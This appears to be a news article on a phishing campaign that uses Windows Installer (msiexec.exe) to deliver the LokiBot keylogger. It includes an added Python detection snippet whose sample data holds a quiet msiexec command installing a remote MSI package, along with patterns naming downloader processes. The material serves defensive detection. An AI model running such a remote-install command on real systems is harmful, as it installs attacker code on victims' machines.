Windows Installer service hacked to infect victims' systems with malware
Cyber-criminals are using a malware spam campaign to exploit a remote code execution vulnerability in Microsoft Office to download and execute malicious scripts on victims' systems.

New research by Trend Micro revealed how hackers are exploiting a vulnerability in Microsoft Office, which was previously patched in September last year, to infect victims' systems with malware.

The vulnerability is being exploited again because the hackers have changed their delivery method: instead of abusing the Windows executable mshta.exe to run a PowerShell script, they now use the Windows Installer service built into Microsoft Windows to infect systems.

Even though mshta.exe is still used by the hackers, it is now invoked as part of the Windows Installer service, thereby bypassing the patch previously issued by Microsoft. The campaign involves hackers sending phishing emails to unsuspecting victims, asking them to "confirm a payment they made to the sender" and to download an infected Word document to check whether their PCs are infected with viruses or malicious code. The documents are labelled "Payment copy.Doc" to make recipients believe they are authentic.

"Once downloaded, Windows Installer (msiexec.exe) will proceed to install an MSIL or Delphi binary to the system. Depending on the MSI package downloaded, it may contain either a heavily obfuscated Microsoft Intermediate Language (MSIL) or Delphi binary file, which then acts as a loader for the actual payload.

"One notable aspect of the package is that it provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious. While this is relatively simple, being able to detect and identify the actual payload might be more difficult since it is contained in the heavily obfuscated MSIL or Delphi binary," the researchers noted.

They added that, since using msiexec.exe to download a malicious MSI package is not a common technique for infecting systems with malware, existing anti-malware solutions are not designed to detect it, even though such solutions can monitor and isolate individual downloader processes like Wscript, PowerShell, Mshta.exe and Winword.exe.
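As an added illustration of the detection gap described above (this is not code from Trend Micro or from the article), the following Python snippet scans process-creation events and flags msiexec.exe launches whose command line points at a remote package URL, weighting quiet installs and Office or mshta.exe parent processes. The event field names follow Sysmon's process-creation event; the command-line shapes, host names and URLs are constructed assumptions, not details taken from the report.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Parents the article names as the usual monitored downloaders, plus Office apps;
# msiexec.exe spawned by one of them is weighted as higher risk.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "mshta.exe",
                      "wscript.exe", "powershell.exe"}

# msiexec install switch (/i or -i) followed by an http(s) package URL.
# The quoting variants are assumed, not taken from the report.
REMOTE_INSTALL = re.compile(r"""(?i)[/-]i\s+["']?(https?://[^\s"']+)""")
QUIET_SWITCH = re.compile(r"(?i)[/-]q(?:n|b|uiet)?\b")


def classify(event: dict) -> Optional[dict]:
    """Return an alert for an msiexec.exe event that installs a remote MSI,
    or None when the event does not match (local package, service start)."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    if image != "msiexec.exe":
        return None
    cmd = event.get("CommandLine", "")
    match = REMOTE_INSTALL.search(cmd)
    if not match:
        return None
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    quiet = QUIET_SWITCH.search(cmd) is not None
    # 1 point for any remote install, +1 for a silent install, +2 for a
    # downloader/Office parent: 3 or more is treated as high severity.
    score = 1 + (1 if quiet else 0) + (2 if parent in SUSPICIOUS_PARENTS else 0)
    return {"host": event.get("Computer", "?"), "parent": parent,
            "url_host": urlsplit(match.group(1)).hostname, "quiet": quiet,
            "severity": "high" if score >= 3 else "medium"}


def scan(events) -> list:
    """Run classify() over an iterable of events and collect the alerts."""
    return [alert for alert in (classify(e) for e in events) if alert]


# Constructed sample events (Sysmon Event ID 1 field names); all values are made up.
SAMPLE_EVENTS = [
    {"Computer": "WS01", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'msiexec.exe /i "http://203.0.113.10/pay/copy.msi" /qn'},
    {"Computer": "WS02", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\bob\Downloads\tool.msi"'},
    {"Computer": "WS03", "Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"C:\Windows\system32\msiexec.exe /V"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```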

The malware being installed and executed on victims' systems using this new technique is LokiBot, which according to the researchers is a "keylogger that was primarily advertised as capable of stealing passwords and cryptocurrency wallets."

"We believe it [using the Windows Installer service in Microsoft Windows operating systems to inject malware] might represent a new evasion mechanism for malware creators to skirt around security software that usually focuses on traditional installation methods," they added.

By learning to identify phishing emails and not downloading attachments from unknown senders, users can prevent their systems from being compromised by this malware. According to Trend Micro, since communications involving business transactions are usually highly professional, employees should also look for grammatical errors and misspellings to catch possible phishing attempts.

"Phishing continues to be a menace that organisations are struggling to deflect. The issue is that most technologies focus on the gateway, utilising content filtering and signatures, which would not spot the compressed messages attackers are using in this instance," says Eyal Benishti, CEO and Founder of Ironscales.

"Focus must move down the stack to the recipient's inbox, that harnesses both human detection and machine intelligence, to automate and respond at scale to these types of attacks. By examining user communications and metadata to establish a baseline, anomalies in communications are easily spotted and automatically flagged as suspicious, to help people make smarter and quick decisions regarding emails within the mailbox," he adds.